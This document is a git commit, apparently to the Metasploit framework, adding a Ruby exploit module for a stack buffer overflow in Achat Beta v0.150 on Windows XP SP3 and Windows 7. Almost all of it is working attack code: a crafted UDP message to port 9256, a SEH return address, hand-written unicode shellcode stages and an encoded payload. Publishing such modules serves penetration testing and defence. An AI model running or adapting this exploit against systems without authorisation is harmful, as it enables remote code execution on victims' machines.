Add Achat Beta v0.150 RCE for Win7/XPSP3

earthquake · earthquake · commit 64ab11c6ba39 · 2015-01-29T23:20:31.000+01:00
diff --git a/modules/exploits/windows/misc/achat_beta.rb b/modules/exploits/windows/misc/achat_beta.rb
@@ -0,0 +1,101 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Udp
+  include Msf::Exploit::Remote::Seh
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Achat Beta v0.150 Buffer Overflow',
+      'Description'    => %q{
+         This module exploits a SEH based unicode stack buffer overflow in Achat v0.150,
+         by sending a crafted message to the default harcoded port 9256. The message
+         overflows the stack and overwrites the SEH handler. The exploit is reliable, but
+         depends of timing. It has two distinct threads that are overflowing the stack in
+         the same time. Tested on Windows XP SP3 and Windows 7.
+         The overflow was found by Peter Kasza.
+      },
+      'Author'         =>
+        [
+         'Balazs Bucsay <balazs.bucsay[-at-]rycon[-dot-]hu>', # Exploit, Metasploit module
+         'Peter Kasza <peter.kasza[-at-]itinsight[-dot-]hu>' # Vulnerability discovery
+        ],
+      'License'	       => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'http://sourceforge.net/projects/achat/files/AChat%20beta/AChat%20beta%207%20%28v0.150%29/'],
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'process'
+        },
+      'Payload'        =>
+        {
+          'Space'    => 730,
+#          'BadChars' => "\x00" + (0x80..0xff).to_a.pack("C*"),
+          'StackAdjustment' => -3500,
+          'EncoderOptions'  =>
+            {
+              'BufferRegister' => 'EAX',
+            }
+
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+        # Tested OK Windows XP SP3, Windows 7
+        # Not working on Windows Server 2003
+          [ 'Achat beta v0.150 / Windows XP SP3 / Windows 7 SP1',   { 'Ret' => "\x2A\x46" } ], #AChat.exe
+        ],
+      'Privileged'     => false,
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Dec 18 2014'))
+
+    register_options(
+      [
+        Opt::RPORT(9256),
+      ], self.class)
+  end
+
+  def exploit
+    connect_udp
+
+    firststage = "\x55\x2A\x55\x6E\x58\x6E\x05\x14\x11\x6E\x2D\x13\x11\x6E\x50\x6E\x58\x43\x59\x39"
+    encoder = framework.encoders.create('x86/unicode_mixed')
+    encoder.datastore.import_options_from_hash({ 'BufferRegister' => 'EAX' })
+    payloadencoded = encoder.encode(payload.raw, nil, nil, platform)
+
+    sploit = "A0000000002#Main" + "\x00" + "Z"*114688 + "\x00" + "A"*10 + "\x00"
+    sploit << "A0000000002#Main" + "\x00" + "A"*57288 + "AAAAASI"*50 + "A"*(3750-46)
+    sploit << "\x62" + "A"*45 # 0x62 will be used to calculate the right offset
+    sploit << "\x61\x40" # POPAD + INC EAX
+
+    sploit << target.ret # AChat.exe p/p/r address
+    # adjusting the first thread's unicode payload, tricky asm-fu
+    sploit << "\x43\x55\x6E\x58\x6E\x2A\x2A\x05\x14\x11\x43\x2d\x13\x11\x43\x50\x43\x5D" + "C"*9 + "\x60\x43"
+    sploit << "\x61\x43" + target.ret # second nseh entry, for the second thread
+    sploit << "\x2A" + firststage + "C"*(157-firststage.length-31-3) # put address of the payload to EAX
+    sploit << payloadencoded + "A"*(1152-payloadencoded.length) # placing the payload
+    sploit << "\x00" + "A"*10 + "\x00"
+
+
+    i = 0
+    while i < sploit.length do
+      if i > 172000
+        sleep(1.0)
+      end
+      udp_sock.put(sploit[i..i+8192-1])
+      i += 8192
+    end
+
+    disconnect_udp
+  end
+
+end
